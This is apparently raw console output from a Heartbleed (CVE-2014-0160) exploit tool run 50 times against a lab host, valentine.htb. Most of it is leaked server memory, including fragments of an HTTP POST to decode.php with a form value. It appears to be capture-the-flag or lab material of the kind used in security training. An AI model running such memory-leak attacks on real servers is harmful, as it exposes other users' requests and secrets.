
defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)

##################################################################
Connecting to: valentine.htb:443, 50 times
Sending Client Hello for TLSv1.0
Received Server Hello for TLSv1.0

WARNING: valentine.htb:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 1 of 50Please wait... connection attempt 2 of 50Please wait... connection attempt 3 of 50Please wait... connection attempt 4 of 50Please wait... connection attempt 5 of 50Please wait... connection attempt 6 of 50Please wait... connection attempt 7 of 50Please wait... connection attempt 8 of 50Please wait... connection attempt 9 of 50Please wait... connection attempt 10 of 50Please wait... connection attempt 11 of 50Please wait... connection attempt 12 of 50Please wait... connection attempt 13 of 50Please wait... connection attempt 14 of 50Please wait... connection attempt 15 of 50Please wait... connection attempt 16 of 50Please wait... connection attempt 17 of 50Please wait... connection attempt 18 of 50Please wait... connection attempt 19 of 50Please wait... connection attempt 20 of 50Please wait... connection attempt 21 of 50Please wait... connection attempt 22 of 50Please wait... connection attempt 23 of 50Please wait... connection attempt 24 of 50Please wait... connection attempt 25 of 50Please wait... connection attempt 26 of 50Please wait... connection attempt 27 of 50Please wait... connection attempt 28 of 50Please wait... connection attempt 29 of 50Please wait... connection attempt 30 of 50Please wait... connection attempt 31 of 50Please wait... connection attempt 32 of 50Please wait... connection attempt 33 of 50Please wait... connection attempt 34 of 50Please wait... connection attempt 35 of 50Please wait... connection attempt 36 of 50Please wait... connection attempt 37 of 50Please wait... connection attempt 38 of 50Please wait... connection attempt 39 of 50Please wait... connection attempt 40 of 50Please wait... connection attempt 41 of 50Please wait... connection attempt 42 of 50Please wait... connection attempt 43 of 50Please wait... connection attempt 44 of 50Please wait... connection attempt 45 of 50Please wait... connection attempt 46 of 50Please wait... connection attempt 47 of 50Please wait... connection attempt 48 of 50Please wait... connection attempt 49 of 50Please wait... connection attempt 50 of 50
##################################################################

.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......10.10.10.79..........................#....."..&..)Z..#..x.N...&.Zlnh.....sl.+F.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#..............;.............................#....."..&..)Z..#8......bQ..).....a~.$.6.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......10.10.10.79..........................#....."..&..)Z..#.=..|x..L....Y....!B.O...69.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#..............;.............................#....."..&..)Z..#...i.539.....~<lv9....~.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......10.10.10.79..........................#....."..&..)Z..#..x.N...&.Zlnh.....sl.+F.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......uage: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://10.10.10.79/decode.php
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

text=OMNLIIIFEGEDC%2Fo%2F9rtU.j.Yz.IC.Lo.9.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#..............;.............................#....."..&..)Z..#...i.539.....~<lv9....~.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......10.10.10.79.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......10.10.10.79..........................#....."..&..)Z..#..x.N...&.Zlnh.....sl.+F.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......10.10.10.79.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......uage: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://10.10.10.79/decode.php
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

text=OMNLIIIFEGEDC%2Fo%2F9rtU.j.Yz.IC.Lo.9.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#..............;.............................#....."..&..)Z..#...i.539.....~<lv9....~.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......10.10.10.79.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#..............;.............................#....."..&..)Z..#8......bQ..).....a~.$.6.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......10.10.10.79..........................#....."..&..)Z..#.=..|x..L....Y....!B.O...69.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......10.10.10.79..........................#....."..&..)Z..#.=..|x..L....Y....!B.O...69.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......10.10.10.79.".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......10.10.10.79..........................#....."..&..)Z..#.=..|x..L....Y....!B.O...69.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......10.10.10.79.".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#...............#...".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#.......10.10.10.79.".&.)...@.
.............
.................@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5..................
.........3.2.....E.D...../...A.................................I.........
.4.2..............
...................................#..............;.............................#....."..&..)Z..#8......bQ..).....a~.$.6

